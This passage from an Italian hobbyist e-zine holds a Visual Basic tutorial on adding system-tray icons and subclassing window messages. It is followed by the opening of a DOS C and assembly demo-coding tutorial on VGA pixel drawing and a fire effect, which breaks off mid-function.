                                   mouse all'interno del rettangolo dell'icona

hIcon As Long -------------------> Handle dell'icona che vogliamo modificare,
                                   cancellare o aggiungere.

szTip As String * 64 ------------> Tooltip dell'icona, ossia il testo che 
                                   appare in quel rettangolino giallo dopo che
                                   il mouse si sovrappone per qualche secondo 
                                   sopra l'icona senza muoversi.

End Type ------------------------> Poco da dire :-)) Da' il fine alla 
                                   struttura (potevo anche risparmiarmelo).
              ---------------------------------------

...........................................
4.1.1 Inseriamo questa malefica di un'icona
===========================================
Bene, ora vi consiglio caldamente di riprendere in mano tutto e di confrontare
con quello che faremo ora, ossia un esempio completo di inserimento di icona 
nella tray. Da notare pero' che questo programma inserisce solo l'icona nella
tray senza fare nient'altro. Non si puo' agire sulla tray e non la si puo' 
togliere. Ormai cmq il + e' fatto.

Questo programma stupido permette di inserire alla pressione del pulsante 
"nonsochenomedargli" un'icona sulla tray.

listato 5
---------------------------------------
Dim nic As NOTIFYICONDATA
Private Declare Function Shell_NotifyIcon Lib "shell32.dll" 
   Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long
Private Type NOTIFYICONDATA
  cbSize As Long
  hwnd As Long
  uID As Long
  uFlags As Long
  uCallbackMessage As Long
  hIcon As Long
  szTip As String * 64
End Type
Private Const NIM_ADD = &H0&
Private Const NIF_MESSAGE = &H1&
Private Const NIF_ICON = &H2&
Private Const NIF_TIP = &H4&
Dim myhandle As Long
Dim icona
Private Const MYTRAY_MESSAGE = &H501&
Private hPrecedente As Long

Private Sub Command1_Click()
'Qui ho messo la chiamata, cmq potevo anche mettere tutto 'insieme e non 
  sarebbe cambiato 'nulla.
  Call Shell_NotifyIcon(NIM_ADD, nic) 
End Sub

Private Sub Form_Load()
  myhandle = Form1.hwnd
'Assegno alla variabile icona il valore Form1.icon.
  icona = Form1.Icon
  'Lunghezza.
  nic.cbSize = Len(nic)   
'Richiamo la variabile precedente. Ho messo 'come icona quella 'del form per 
   rendere piu' corto possibile il programma.
  nic.hIcon = icona 
'Gia' lo conosciamo bene.
  nic.hwnd = Form1.hwnd   
'ToolTip dell'icona nella tray.
  nic.szTip = "La mia icona nella TaskBar!" & vbNullChar   
'Importante ma lo vedremo poi.
  nic.uCallbackMessage = MYTRAY_MESSAGE   nic.uFlags =     
  NIF_MESSAGE + NIF_ICON + NIF_TIP
  nic.uID = 1
End Sub
---------------------------------------

Con un form vuoto ed un solo tasto di nome nonsochenomedargli.

Guardate! Ristretto all'osso. Direi che cmq e' anche semplice. In questo modo
potete inserire l'icona, ma questo e' veramente il modo piu' semplice, magari
piu' avanti vi mostrero' metodi piu' avanzati e comodi per scrivere programmi
anche piu' complessi.
Finalmente lo abbiamo capito spero. Ora passiamo oltre, e' praticamente 
identico, ma per sicurezza facciamo anche la cancellazione di una icona.

listato 6
---------------------------------------
Dim nic As NOTIFYICONDATA
Private Declare Function Shell_NotifyIcon Lib "shell32.dll" 
  Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long
Private Type NOTIFYICONDATA
  cbSize As Long
  hwnd As Long
  uID As Long
  uFlags As Long
  uCallbackMessage As Long
  hIcon As Long
  szTip As String * 64
End Type
Private Const NIM_DELETE = &H2&
Private Const NIF_MESSAGE = &H1&
Private Const NIF_ICON = &H2&
Private Const NIF_TIP = &H4&
Dim myhandle As Long
Dim icona
Private Const MYTRAY_MESSAGE = &H501&
Private hPrecedente As Long

Private Sub Command1_Click()
'Qui ho messo la chiamata, cmq potevo anche mettere tutto insieme e non 
  sarebbe cambiato nulla.
  Call Shell_NotifyIcon(NIM_DELETE, nic)
End Sub

Private Sub Form_Load()
  myhandle = Form1.hwnd
'Assegno alla variabile icona il valore Form1.icon.
  icona = Form1.Icon
  'Lunghezza.
  nic.cbSize = Len(nic)   
'Richiamo la variabile precedente. Ho messo 'come icona quella 'del form per 
  rendere piu' corto possibile il programma.
  nic.hIcon = icona 
'Gia' lo conosciamo bene.
  nic.hwnd = Form1.hwnd   
'ToolTip dell'icona nella tray.
  nic.szTip = "La mia icona nella TaskBar!" & vbNullChar   
'Importante ma lo vedremo poi.
  nic.uCallbackMessage = MYTRAY_MESSAGE   nic.uFlags =     
  NIF_MESSAGE + NIF_ICON + NIF_TIP
  nic.uID = 1
End Sub
---------------------------------------

Chiaramente il delete ha senso solo se l'icona e' gia' presente. Quindi 
normalmente o c'e' anche ADD oppure niente DELETE.

........................
5.1.1 Un ulteriore passo
========================
OK, spero che ora siate riusciti a fare entrambe le cose. Una volta fatto cio'
avere l'icona di quel programma nella tray non ha assolutamente nessuna 
utilita' (anzi). Per renderlo utile bisognerebbe almeno fare qualcosa tipo un
tasto la cui pressione determina la creazione dell'icona (come prima) ma 
anche la sparizione del form:

listato 7
---------------------------------------
Private Sub nonsochenomedargli_Click()
'Questo considerato che tutto il resto sia gia' stato scritto 'altrove.
  Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso)
  ilvostroform.visible = false
End Sub
---------------------------------------

Ecco, qui c'e' un minimo di utilita'. Pero' ora, se uno volesse diciamo vedere
il rivedere il form? Semplicissimo si potrebbe dire:

listato 8
---------------------------------------
Private Sub nonsochenomedargli_Click()
'Questo considerato che tutto il resto sia gia' stato scritto 'altrove.
  Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso
  ilvostroform.visible = true
End Sub
---------------------------------------

eheh. No. Perche' nulla del programma si vede se non l'icona nella tray. Ecco
qui che entra la seconda parte del nostro lavoro, cioe' fare in modo che 
l'icona reagisca ad operazioni su di lei agite. Ad esempio molto bello 
sarebbe fare in modo che al doppio click il programma ritornasse. Ecco, per 
fare questo ed altro entra in campo il NIM_MODIFY che avevamo visto prima ma 
che non avevamo utilizzato. Questa parte potrebbe sembrare difficile, ma in 
realta', come prima, se facciamo tutto passo passo non dovrebbe presentare 
problemi.

........................
6.1.1 L'ultima frontiera
========================
Ecco qui, nuovo capitolo, nuovo programma. Cerchiamo di vedere bene come 
realizzare il Subclassing (voglio far notare che questo e' Subclassing). 
Per prima cosa c'e' il prototipo della funzione WindowProc:

listato 9
---------------------------------------
[Public] [Private] Function WindowProc(ByVal hWnd As Long, 
  ByVal uMsg As Long,_
ByVal wParam As Long, ByVal lParam As Long) As Long
---------------------------------------

I dati di questa funzione sono esattamente quelli del messaggio e vi rimando 
quindi al capitolo 2.1.1 (| La struttura del messaggio |) in cui si illustrano
le varie proprieta' della funzione in esame.

Successivamente per specificare al sistema la Window Procedure da utilizzare 
ci si serve dell'API SetWindowLong il cui prototipo e' illustrato sotto:

listato 10
---------------------------------------
[Public] [Private] Declare Function SetWindowLong Lib "user32" 
  Alias "SetWindowLongA" _ 
(ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
---------------------------------------

I parametri di questa funzione sono ivece i seguenti:

hWnd --------> Che rompimento, ormai questo lo conoscete come casa vostra.
nIndex ------> Il tipo di informazione richiesta (ai fini Subclassistici 
               (l'ho inventata io questa?:) a noi interessera' maggiormente 
               la GWL_WNDPROC=-4). Tanto per curiosita' eccoli tutti:

tabella 3
          ----------------------------------------------------
          |Identificatore |Utilizzo                          |
          ---------------------------------------------------- 
          |GWL_EXSTYLE    |Imposta un nuovo stile esteso del-|
          |               |la finestra.                      |
          ---------------------------------------------------- 
          |GWL_STYLE      |Imposta un nuovo stile della fi - | 
          |               |nestra.                           |   
          ----------------------------------------------------   
          |GWL_WNDPROC    |Imposta un nuovo indirizzo della  | 
          |               |Window Procedure.                 | 
          ----------------------------------------------------
          |GWL_HINSTANCE  |Imposta un nuovo handle dell'i-   |
          |               |stanza dell'applicazione.         |
          ---------------------------------------------------- 
          |GWL_ID         |Imposta un nuovo identificatore   |
          |               |della finestra.                   |
          ---------------------------------------------------- 
          |GWL_USERDATA   |Imposta il valore a 32bit user-   |
          |               |defined.                          |
          ----------------------------------------------------

dwNewLong --->Passa il nuovo valore (Address WindowProc).
OK. Ora vediamo un'altra (eh si, un'altra) funzione da dicharare, ossia la 
CallWindowProc, ecco il prototipo:

listato 11
----------------------------------------------------
[Public] [Private] Declare Function CallWindowProc Lib "user32" 
Alias "CallWindowProcA" _
(ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, _
ByVal wParam As Long, ByVal lParam As Long) As Long
----------------------------------------------------

A leggerle sono tutte un casino, ma poi alla fin fine sono solo da fare copia
incolla eheheh, ma che divertimento c'e' se non le capite? Ed ora vediamo 
come siamo messi con le proprieta':
lpPrevWndFunc --------->Puntatore della procedura.
hWnd ------------------> No comment!
Msg -------------------> Come uMsg (identificatore del messaggio).
wParam, lParam --------> Nfo aggiuntive.

Questa funzione serve per passare il messaggio da uMsg alla finestra di 
Subclass il cui handle e' il nostro amico hWnd (tanto per cambiare).

Ora il piu' e' fatto, ora dobbiamo solo impostare la diramazione dei casi 
con Select Case. I casi piu' importanti sono:

ON_WM_LBUTTONDBLCLK( )
ON_WM_LBUTTONDOWN( )
ON_WM_LBUTTONUP( ) 
ON_WM_MBUTTONDBLCLK( ) 
ON_WM_MBUTTONDOWN( ) 
ON_WM_MBUTTONUP( )
ON_WM_MDIACTIVATE( ) 
ON_WM_MEASUREITEM( )
ON_WM_MENUCHAR( )
ON_WM_MENUSELECT( )
ON_WM_MOUSEACTIVATE( ) 
ON_WM_MOUSEMOVE( )
ON_WM_MOUSEWHEEL( ) 
ON_WM_MOVE( )
ON_WM_MOVING( ) 

OK. Ora dovreste essere pronti per la botta di esempi. Ora sapete tutto e 
possiamo passare al vero programma iniziando dalla parte di diramazione per 
poi fare un intero programma funzionante:

listato 12
---------------------------------------
Public Function IntercettaMsg(ByVal hwnd As Long, ByVal MSG As Long, ByVal 
 wParam As Long, ByVal lParam As Long) As Long
  If MSG = MYTRAY_MESSAGE Then
    Select Case lParam
    Case WM_LBUTTONUP:
      fai.qualcosa
'Mostra il menu impostato. Questo pero' e' piuttosto rilevante e 'lo vedremo 
  nel capitolo successivo.
      Call Form1.MostraMenu
    Case WM_RBUTTONUP:
      fai.qualcosa
    Case WM_LBUTTONDBLCLK:
      fai.qualcosa
    Case WM_RBUTTONDBLCLK:
      fai.qualcosa
    Case Else:
      fai.qualcosa
    End Select
   End If
   IntercettaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

............
7.1.1 I menu
============
Altra cosa molto importante a questo punto sono i menu. Quasi tutte le 
applicazioni che hanno la possibilita' di far apparire un'icona sulla tray 
possiedono una tendina di menu che appare alla pressione di un determinato 
tasto. Ora dobbiamo anche capire come funziona questa tendina. La cosa e' 
estremamente semplice e di facile comprensione e non prevede che una righetta
di codice (che avete visto esemplificata nel listato 12). Come funziona? La 
tendina che appare viene presa da quella di un form che puo' essere visibile 
sia sul form che sulla tendina che solo sulla tendina. Quindi prima 
programmate tutte le voci della tendina sul form come se fossero la barra 
quella con le voci File, Modifica ecc... e poi richiamate la parte che vi 
interessa. Ora vediamo di analizzare la questione piu' da vicino:

listato 13
---------------------------------------
Call Form1.MostraMenu
---------------------------------------

Tutto qua. Mi pento anche di averlo numerato come listato :) Intanto vediamo 
subito dal principio:

Call --------> Non necessita commenti direi diciamo che esegue.
Form1 -------> Questa parte indica da dove si devono prendere i dati per la 
               tendina.
MostraMenu --> Questo e' il nome della tendina che viene assegnato nell'editor
               dei menu. Quindi se volete che si vede ovunque, spuntato 
               Visible, altrimenti no e si vedra' solo sulla tendina 
               dell'icona. 

Ora non vi resta altro da fare che provare.

................
8.1.1 Gli esempi
================
OKOKOKOK. Molto bene. Ora non dovete fare altro che mettere tutto insieme e 
fare un po' di pratica per escogitare anche dei metodi per velocizzare il 
tutto. Non vi preoccupate per ora anche se non avete capito perche' ora c'e' 
ancora da leggere ed avete ancora tempo per capire. Ora cominciamo con gli 
esempi. Per prima cosa faccio un esempio nuovamente spiegato pari pari a 
tutto cio' che vi ho detto fin'ora senza cambiare neanche una virgola e 
riportandovi di fianco i capitoli da rivedere per la spiegazione della 
funzione o cmq del punto. Spero in questo modo di semplificarvi al massimo la
lettura e lo studio.
Ora iniziamo col primo.

..................
8.2.1 - 1 Esempio
==================
Questo programma ha un'icona sulla tray (quella del Form1) che viene caricata
al momento del load del form, poi un tasto "nonsochenomedargli" per la sua 
rimozione e poi imposteremo l'icona nella tray in modo che alla pressione di 
un doppio click del tasto sinistro (anche qui potete modificare l'evento come
volete, il mio e' solo un esempio) appaia un MsgBox con scritto dentro 
qualcosa. Nulla di particolare, la semplicita' piu' assoluta.

Il programma comprende quindi due elementi, il primo un Form Form1 con un solo
tasto di nome nonsochenomedargli ed un modulo, piu' semplice non penso di 
essere in grado di farvelo, se non tagliando qualche riga che pero' rende 
estremamente piu' chiaro il tutto. Vorrei precisare che voi nel modulo 
potreste inserire tutto cio' che puo' servire per il Subclassing in modo da 
poterlo utilizzare anche in altri programmi semplicemente importandolo anche 
se magari c'e' una parte di codice ridondante per ogni programma. Magari poi 
ne faccio uno:

Modulo1: listato 14
---------------------------------------
Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" 
  (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal MSG As Long, 
    ByVal wParam As Long, ByVal lParam As Long) As Long 

'Capitolo 6.1.1 L'ultima Frontiera.

Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" 
  (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

'Capitolo 6.1.1 L'ultima Frontiera.

Public Declare Function Shell_NotifyIcon Lib "shell32.dll" 
   Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long

'Questo fa parte dell'inserimento dell'icona e non del 
'Subclassing Capitolo 3.2.1 - La Shell_NotifyIcon.
Public Const GWL_WNDPROC = (-4&) 
'Di questo ne abbiamo parlato nel capitolo riguardante il 
'subclassing Capitolo 6.1.1 L'ultima Frontiera.
Public Const NIM_ADD = &H0&      
'Questi sono i soliti codici che servono per riconoscere le 'varie azioni,
Public Const NIM_DELETE = &H2&   
'potete utilizzare questi oppure anche senza dichiararli usando 
'solo la stringa.
Public Const NIF_MESSAGE = &H1&  
'Questa e' l'unica parte che si puo' tagliare, ma mi sembrava poco 'chiaro.
Public Const NIF_ICON = &H2&
Public Const WM_LBUTTONDBLCLK = &H203&
Public Const MYTRAY_MESSAGE = &H501& 
'Questo ve lo faccio notare nuovamente, ma dopo ne parleremo 
'meglio.
 
Public Type NOTIFYICONDATA 
'Anche questo lo abbiamo gia' studiato nel capitolo 3.3.1 - La 
'struttura di NOTIFYICONDATA
  cbSize As Long
  hwnd As Long
  uID As Long
  uFlags As Long
  uCallbackMessage As Long
  hIcon As Long
  szTip As String * 64
End Type

Public hPrecedente As Long 
'Dichiara semplicemente una variabile che vedremo usata in 
'seguito. 
'Tutto quello che segue e' parte del capitolo 6.1.1 L'ultima 
'frontiera, solo leggermente tagliato.
Public Function IntercettaMsg(ByVal hwnd As Long, ByVal MSG As Long, 
  ByVal wParam As Long, ByVal lParam As Long) As Long
  If MSG = MYTRAY_MESSAGE Then
    Select Case lParam
'Qui per semplcita' ho inserito una sola diramazione, ma potete 
'inserirne quante vi pare.
      Case WM_LBUTTONDBLCLK:
'non fa alcuna differenza, poi anche l'evento generato e' solo 
'per rendere semplice il tutto, potete fare qualsiasi cosa.
        MsgBox "qualcosa :)"
      End Select
  End If
  IntercettaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

Ah, eccoci di nuovo fuori dalla finestra del codice. Bellino e'? 
Ora rientriamo per vedere il Form1:

Form1: lstato 15
---------------------------------------
'Ancora parte della struttura NOTIFYICONDATA
Dim unavariabileacaso As NOTIFYICONDATA 

'Qui sotto ho fatto in modo che al caricamento del form venisse 
'dichiarata tutta la struttura NOTIFYICONDATA che avreste potuto 
'mettere altrove. La parte che fa apparire l'icona
'effettivamente e' Call Shell_NotifyIcon(NIM_ADD, 
'unavariabileacaso), e quella l'avremmo anche potuta separare e 
'mettere al click di un tasto.
Private Sub Form_Load()
  unavariabileacaso.cbSize = Len(unavariabileacaso)
  unavariabileacaso.hIcon = Form1.Icon
  unavariabileacaso.hwnd = Form1.hwnd
  unavariabileacaso.szTip = "La mia icona nella TaskBar!" & vbNullChar
  unavariabileacaso.uCallbackMessage = MYTRAY_MESSAGE
  unavariabileacaso.uFlags = NIF_MESSAGE + NIF_ICON + NIF_TIP
  unavariabileacaso.uID = 1
'Questa parte e' importante e soprattutto quella con AddressOf, 
'ma la vedremo in un altro capitolo.
  hPrecedente = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf IntercettaMsg)
'Ecco la chiamata di cui vi ho parlato sul commento sopra.
  Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso)
End Sub

Private Sub nonsochenomedargli_Click()
  Call SetWindowLong(hwnd, GWL_WNDPROC, hPrecedente)
'e qui come vi accennavo sopra ho staccato la Call dal resto, 
'che basta una volta; l'unico cambiamento e' NIM_DELETE.
  Call Shell_NotifyIcon(NIM_DELETE, unavariabileacaso)
End Sub
---------------------------------------

Uff. Che fatica. Ora e' OK anche questo. Spero che il tutto ora vi sia piu' 
familiare, ma cmq abbiamo ancora esempi da vedere insieme ed avete ancora 
tempo di impratichirvi con questo Subclassing. Ora vediamo di inserire 
qualcos'altro di interessante. Vediamo quello che piu' volte vi ho accennato 
del MYTRAY_MESSAGE. Questo MYTRAY_MESSAGE e' una costante dichiarata nell'area
delle dichiarazioni che assume il valore dell'uCallbackMessage. Quindi e' 
diciamo il messaggio di ritorno dall'icona sulla tray.

........................................
8.2.2 - Perche' l'utilizzo di AddressOf?
========================================

Allora e' una cosa piuttosto complicata, ma diciamo che serve per impostare il
terzo parametro (dwNewLong) nel momento in cui io inveco la funzione SetWindow
Long. Alla funzione AddressOf si fa seguireil nome della nostra nuova Windows
Procedure che deve essere prima dichiarata come Public nel modulo. 

Praticamente con AddressOf noi invochiamo quella function che avevamo scritto
precedentemente e la incastriamo tra i tr parametri della SetWindowLong.

..................
8.3.1 - 2 Esempio
==================
Ora ci vediamo questo secondo esempio, chiaramente se ancora non avete capito
la parte precedente vi consiglio vivamente di rivedervela perche' altrimenti 
la comprensione in questa sara' ancora piu' difficile. 
Se invece, come penso, avete capito il resto per bene, ora inizierete a 
trovare la cosa molto piu' ragionevole in termini di tempo.
Ora, nella creazione di programmi io consiglio di utilizzare delle routine del
genere:

listato 16
---------------------------------------
Sub Iconizza(A As PictureBox, Ms As String)
  NI.cbSize = Len(NI)
  NI.HWnd = A.HWnd
  NI.uID = 0
  NI.uID = NI.uID + 1
  NI.uFlags = NIF_MESSAGE Or NIF_ICON Or NIF_TIP
  NI.uCallbackMessage = WM_MOUSEMOVE
  NI.hIcon = A.Picture
  NI.szTip = Ms + Chr(0)
  Call Shell_NotifyIcon(NIM_ADD, NI)
End Sub
---------------------------------------

Questa volta ho evitato di inserire commenti per rendere piu' visibile il 
listato che per la sua dimensione molto ridotta e' di semoplice comprensione.
Cosa ho fatto? Ho inserito il solito codice che conoscete bene per la 
struttura NOTIFYICONDATA.
Pero' ho fatto una cosa piuttosto intelligente (cosa strana per me), ho fatto
in modo che con questa Sub venisse fuori un "comando" dalla sintassi:

listato 17
---------------------------------------
Iconizza [nomeiconadellapicturebox], [Tooltippericona]
---------------------------------------
Capito? In questo modo la cosa diventa molto utile soprattutto quande ci si 
trova a dover cambiare spesso icona e Tooltip in relazione a diversi eventi e
diverse situazioni. Tutto chiaro? Non e' stato aggiunto nulla alla fin fine 
che voi gia' non conosceste, ma abbiamo solo utilizzato le variabili in modo 
intelligente.

..................
8.4.1 - 3 Esempio
==================
Sulla scia di questo non e' difficile intuire che sempre per velocizzare la 
scrittura del programma si potrebbe anche fare una cosa di questo tipo:

listato 18
---------------------------------------
Sub TrucidaIcona()
  Call Shell_NotifyIcon(NIM_DELETE, NI)
End Sub
---------------------------------------

tanto per non dover scrivere ogni volta tutta questa roba:

listato 19
---------------------------------------
Call Shell_NotifyIcon(NIM_DELETE, NI)
---------------------------------------

eheheh. Semplicissimo anche questo. Solo qualche piccolo trucchetto.

...............................
9.1.1 Manteniamo la promessa :)
===============================
OK. Precedentemente vi avevo detto che vi avrei costruito un piccolo modulo 
che contenesse tutto cio' che potesse servire per eseguire il Subclassing; 
ebbene, eccolo qui:

modulo1: listato 20
---------------------------------------
' Piccolo modulo per
' la gestione di una
' icona nella tray
' Created by R a m s e s

Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" 
  (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal MSG As Long, 
    ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" 
  (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA" 
  (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, 
    ByVal lParam As Long) As Long

Public Const GWL_WNDPROC = (-4&)

Dim A As NOTIFYICONDATA

Public Const NIM_ADD = &H0&
Public Const NIM_MODIFY = &H1&
Public Const NIM_DELETE = &H2&
Public Const NIF_MESSAGE = &H1&
Public Const NIF_ICON = &H2&
Public Const NIF_TIP = &H4&

Public Const WM_MOUSEMOVE = &H200&
Public Const WM_LBUTTONDOWN = &H201&
Public Const WM_LBUTTONUP = &H202&
Public Const WM_LBUTTONDBLCLK = &H203&
Public Const WM_RBUTTONDOWN = &H204&
Public Const WM_RBUTTONUP = &H205&
Public Const WM_RBUTTONDBLCLK = &H206&

Public Declare Function Shell_NotifyIcon Lib "shell32.dll" 
  Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long

Public Type NOTIFYICONDATA
  cbSize As Long
  hwnd As Long
  uID As Long
  uFlags As Long
  uCallbackMessage As Long
  hIcon As Long
  szTip As String * 64
End Type

Public Const MYTRAY_MESSAGE = &H501&
Public hPrecedente As Long

'Questo vi ho spiegato come usarlo
Sub TrucidaIcona()
  Call Shell_NotifyIcon(NIM_DELETE, NI)
End Sub

'Anche questo ve l'ho spiegato
Sub Iconizza(A As PictureBox, Ms As String)
  NI.cbSize = Len(NI)
  NI.hwnd = A.hwnd
  NI.uID = 0
  NI.uID = NI.uID + 1
  NI.uFlags = NIF_MESSAGE Or NIF_ICON Or NIF_TIP
  NI.uCallbackMessage = WM_MOUSEMOVE
  NI.hIcon = A.Picture
  NI.szTip = Ms + Chr(0)
  Call Shell_NotifyIcon(NIM_ADD, NI)
End Sub

Public Function BeccaMsg(ByVal hwnd As Long, ByVal MSG As Long, 
  ByVal wParam As Long, ByVal lParam As Long) As Long
  If MSG = MYTRAY_MESSAGE Then
    Select Case lParam
      Case WM_LBUTTONUP:
      Case WM_RBUTTONUP:
      Case WM_LBUTTONDBLCLK:
      Case WM_RBUTTONDBLCLK:
      Case Else:
    End Select
  End If
  BeccaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

OK. Anche questa e' fatta. Ora penso che su questo argomento ne sappiate quasi
piu' di me eheheh.
Ora se non vi e' tutto molto chiaro rileggete e stato un poco a fare 
esperimenti col testo davanti e vedrete che capirete e riuscirete a fare. 
Se volete un consiglio prima di usare il mio modulo che e' un "canned tools" 
(strumenti impacchattati) perche' vi arriva tutto gia' pronto e non dovete 
fare nessuna fatica, vi consiglio di fare da soli. 
Poi usatelo senza problemi perche' e' quasi come se ve lo foste fatto voi. 
Poi, una volta che tutto cio' vi diventa familiare e normale nell'utilizzo 
vedrete che anche voi riuscirete a "migliorarvi la vita". Bene, anche questo 
giorno e' finito, vi chiedo scusa per eventuali errori di scrittura e se i 
miei listati non siano sempre chiari, anche a causa del fatto che io li ho 
fatti prima col VB per testarli, quindi cambiando formato ci sono stati 
problemi. Se aveste problemi con tutto cio' potete contattarmi senza alcun 
problema, sono a vostra disposizione (e non pensate che sia un mago neanche 
io).

........................
10.1.1 How to Contact me
========================
http://evilzone.tsx.org
ICQ: 39860665
mail: ram5e5@freemail.it

---R A M S E S---

------------------------------------------------------------[ dEmo-cOdInG ]---
===] PICCOLI DEMO CON IL PC ]=================================================
-----[ Orka4n ]---------------------------------------------------------------

Premessa:
Ciao a tutti quanti.
Io sono Orka4n, non sono un hacker, neanche un demo coder mi piacerbbe esserli
,
ma per adesso posso definirmi solo uno smanettone. 
le informazioni che troverete in questo articolo sono puramente a scopo
didattico, comunque poich parleremo di "demo" e non di hacking, ecc. potete
benissimo utilizzarle, anche se io non mi prendo nessuna responsibilit.

Questo  il mio primo articolo (sempre se si possa chiamarlo tale) mi scuso
con tutti quelli che leggeranno (quanti siete?) perch il mio italiano fa
pena e non ci posso fare niente.

Inizio:
Volevo discutere di un argomento abbastanza affascinante; la grafica con il
computer (come fare dei demo, dei  "videogiochi" tanto per intenderci )

Molti di voi avranno visto una demo grafica e credo che tutti
abbiano giocato con un video game. Vi siete mai chiesti come si faccia un
gioco o una demo?

Se sapete gi tutto potete anche non leggere questo brandello di bit, se no
fate quello che volete.

una demo semplice richiede:
1) La conoscenza di un linguaggio di pgm tipo C o pascal
2) un idea originale

un demo complesso (3d con texture ecc, tanto per intenderci) richiede:
1) la conoscenza dell'assembly (non sempre obbligatoria)
2) nozioni di geometria
3) un'idea originale, che ci vuole sempre

Noi parleremo di demo sempilci, di come si possa dire al pc di impostare la
grafica, disegnare qualcosa a video e poi come fare qualche effetto come
il plasma o il fuoco.

Iniziamo:
Se non avete la conoscenza del c o di un minimo di assembly , cosa sono i
registri e cosa sono gli int ... sar un p dura, per se vedr che
l'argomento vi ha interessato decider se fare o no qualcosa alla portata di
TUTTI.

come si fa a disegnare col pc?

bisogna dire al computer vai alla cordinata x, y dello schermo e accendi quel
puntino, pixel, con il colore che vogliamo  (elementare no?)

Bene ora passiamo alla realizzazione pratica:

Premetto tutto il  codice da me scritto  stato compilato usando il 
compilatore
della borland il c++ versione 3.0 percui forse c' qualcosa che bisogna
aggiustare in caso non abbiate il su detto compilatore.

/*impostazione della modalit grafica, all'inizio siamo in modalit testo e
  possiamo solo visualizzare caratteri e non disegnare! */

  void set_vga() {
    asm mov ax,13h   //imposta modalit 320(x) x 200(y) (256 colori)
    asm int 10h      //questo  inline assembly permesso dal c
  }

ma ora che abbiamo settato la modalit grafica cosa facciamo ?
proviamo a disegnare un pixel a video. Per fare questo esistono 3 modi:

1) modo + lento si richiama un int (una subroutine del bios)
     int           10h
     registri      AH         0Ch
                   AL         colore
                   CX         x (0-319)
                   DX         y (0-199)
                   BH         1   -> pagina (non ci serve, per altre modalit)

     registri alterati:      AX, SP, BP, SI, DI

void int_put_pixel(int x, int y, unsigned char col){

             // cordinate x(0-319), y(0-199)
  asm{
      mov ah,0Ch
      mov al,col
      mov cx,x
      mov dx,y
      mov bx,1
      int 10h
     }
    }

2) modo andiamo direttamente in memoria video che parte dall'indirizzo
    0xa000 quindi se noi vogliamo disegnare nella posizione x,y
    dobbiamo fare      0xa000 + x + (y*xsize) = colore
    nel nostro caso xsize = 320
    void mem_put_pixel(int x,int y, unsigned char col){
      unsigned char *mem;
      mem = (unsigned char *) MK_FP(0xa000 , x+y*320);

       //crea un puntatore (serve dos.h)

      *mem = col;   //disegno nel punto giusto
    }


    l'operazione di moltiplicazione  lenta percui si pu  usare
    uno stratagemma
    y * 320 = y<<6 + y<<8   (operzioni di shift  y*256 + y*64 )

    quindi mem =(unsigned char *) MK_FP(0xa000 + x + y<<8 + y<<6);

 3) modo tutto in assembly il pi veloce 

   void put_pixel(int x,int y,char col){
    asm {
      mov   ax,0xa000
      mov   es,ax
      mov   di,x
      mov   dx,y
      xchg  dl,dh        //dx = y<<8 = y*256
      add   di,dx        //di = x + y<<8 = x + y*256
      shr   dx,2         //dx = y<<6 = y*64     impostare compilazione 286
      add   di,dx        //di = x + y<<8 + y<<6 = x+ y*320 (256+64)
      mov   al,col
      stosb              //stosb = mov es:[di],al
    }
   }

vi chiederete perch vi ho proposto 3 funzioni che fanno la stessa cosa,
la risposta  semplice, volevo farvi capire che per programmare una demo, o
un gioco, bisogna sfruttare al massimo la macchina (pc) che si usa perch,
pi veloce  un routine, pi cose possimao fare.

Chiusa questa piccola nota vediamo cosa si pu fare con la sola funzione
put_pixel.

1 disegnare una linea orrizontale o verticale, con un p di geometria anche
  una linea generica
2 fare dei rettangoli pieni o vuoti
3 disegnare dei cerchi (usando seno e coseno)
4 ...

 (lascio a voi implementare i 3 punti, se vi interessa chiedetemi)
 ( l' 1 e il 2 sarebbe meglio farli direttamente in asm)

Nota(quante ne faccio di ste note):

Ci sarebbero ancora tante funzioni che si dovrebbereo sviluppare, ma non
posso mica scrivere un libro vi consiglio di provare e provare e caso mai
chiedetemi

----> ora si comincia con il divertimento facciamo il fuoco o meglio un
      fuocherello.

Premessa:

L'effetto grafico del fuoco  stato sviluppato e modificato da tanttismi
demo coder e non, percui se trovate in giro un demo molto simile al mio,
sappiate che io non sono l'inventore dell'effetto del fuoco e che ho dovuto
dodumentarmi su come si possa fare questo effetto (ci sono decine di tut
sull'argomento). Quindi non venite a dirmi che ho copiato   o cazzate del
genere, perch  come dire a un pasticcere che quando fa una torta, magari
alle mele, che ha copiato visto che non  di sua invenzione.
  
Finita questa precisazione cos lunga, ma neccessaria, possiamo veramente
iniziare...

Di cosa abbiamo bisogno?  
  
1 abbaimo bisogno di un bel set di colori e come fare?
   esiste la possibilit di impostare i nostri 256 colori che non sono altro
   che valori RGB (rosso verde blu)
   ma ecco subito la funzione:

 set_color(unsigned char ncol,unsigned char r,unsigned char g,unsigned char b)
 {
